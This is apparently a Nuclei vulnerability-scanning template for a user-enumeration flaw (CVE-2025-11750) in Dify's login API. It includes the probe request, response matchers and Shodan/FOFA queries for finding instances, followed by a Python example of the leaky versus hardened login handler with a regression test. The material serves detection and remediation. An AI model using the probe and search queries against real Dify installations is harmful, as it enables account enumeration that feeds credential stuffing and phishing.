id: CVE-2025-11750

info:
  name: Dify - User Enumeration via "Account not found" Message
  author: Kazgangap
  severity: medium
  description: |
    A user enumeration vulnerability exists in langgenius/dify, where the login API leaks information about whether a user account exists or not. When an invalid/non-existent email is used during login, the API returns a distinct error message such as "account_not_found" or "Account not found.", allowing attackers to identify valid accounts.
  impact: |
    Attackers can enumerate valid user accounts through distinct error messages returned by the login API, facilitating targeted credential stuffing and phishing attacks against Dify installations.
  remediation: |
    Upgrade to the patched version of Dify that implements generic error messages for authentication failures.
  reference:
    - https://huntr.com/bounties/e7359f9f-c004-4304-9de9-753622d370a1
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-11750.md
    - https://github.com/langgenius/dify/issues/24323
    - https://github.com/langgenius/dify/pull/25369
  metadata:
    verified: true
    vendor: langgenius
    product: dify
    shodan-query: http.favicon.hash:"97378986"
    fofa-query: icon_hash="97378986"
  tags: cve,cve2025,langgenius,dify,user-enum,vuln

variables:
  fake_email: "{{to_lower(rand_text_alphanumeric(16))}}@{{to_lower(rand_text_alphanumeric(16))}}.com"
  fake_password: "{{rand_text_alphanumeric(16)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /signin HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Dify")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        POST /console/api/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"email":"{{fake_email}}","password":"{{fake_password}}","language":"en-EN","remember_me":true}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "account_not_found", "message")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 400'
        condition: and
# digest: 4a0a00473045022100fe013d1d3ac5082d23151fb2703594e7dfa38cc04c9d6af149f12bc1a8fcdf39022007deb67d4c06ca76cfa30db25296b5848916aacb75863f2f82ea7da2f329fab7:922c64590222798bb761d5b6d8e72950
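The flaw the template above matches on, shown as an added example that is not Dify's code: a minimal login handler with the leaky "account_not_found" branch beside a hardened version that returns one generic response for unknown email and wrong password alike, plus a regression check in the spirit of the template's matcher. The user table, emails and the `login_*`/`leaks_account_existence` names are constructed for this example.

```python
import hashlib
import hmac
import os

# Constructed sample user store: email -> (salt, PBKDF2-HMAC-SHA256 digest).
def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)

_SALT = os.urandom(16)
USERS = {"alice@example.com": (_SALT, _hash("correct horse", _SALT))}

# Dummy credential verified when the email is unknown, so both paths do the
# same password work and cannot be told apart by response or timing.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash("placeholder", _DUMMY_SALT)


def login_leaky(email: str, password: str):
    """Vulnerable pattern: a distinct error reveals that the email is unknown."""
    rec = USERS.get(email)
    if rec is None:
        return 400, {"code": "account_not_found", "message": "Account not found."}
    salt, digest = rec
    if not hmac.compare_digest(_hash(password, salt), digest):
        return 400, {"code": "invalid_password", "message": "Invalid password."}
    return 200, {"result": "success"}


def login_hardened(email: str, password: str):
    """Fixed pattern: identical status and body whether or not the email exists."""
    salt, digest = USERS.get(email, (_DUMMY_SALT, _DUMMY_HASH))
    ok = hmac.compare_digest(_hash(password, salt), digest) and email in USERS
    if not ok:
        return 400, {"code": "invalid_credentials",
                     "message": "Invalid email or password."}
    return 200, {"result": "success"}


def leaks_account_existence(handler) -> bool:
    """Regression check: does an unknown email produce a different response
    than a wrong password for a known email? True means enumerable."""
    unknown = handler("nobody-" + os.urandom(4).hex() + "@example.invalid", "x")
    wrong = handler("alice@example.com", "wrong password")
    return unknown != wrong
```

Wire `leaks_account_existence(login_hardened)` into a test suite so a future refactor that reintroduces a per-branch error message fails CI.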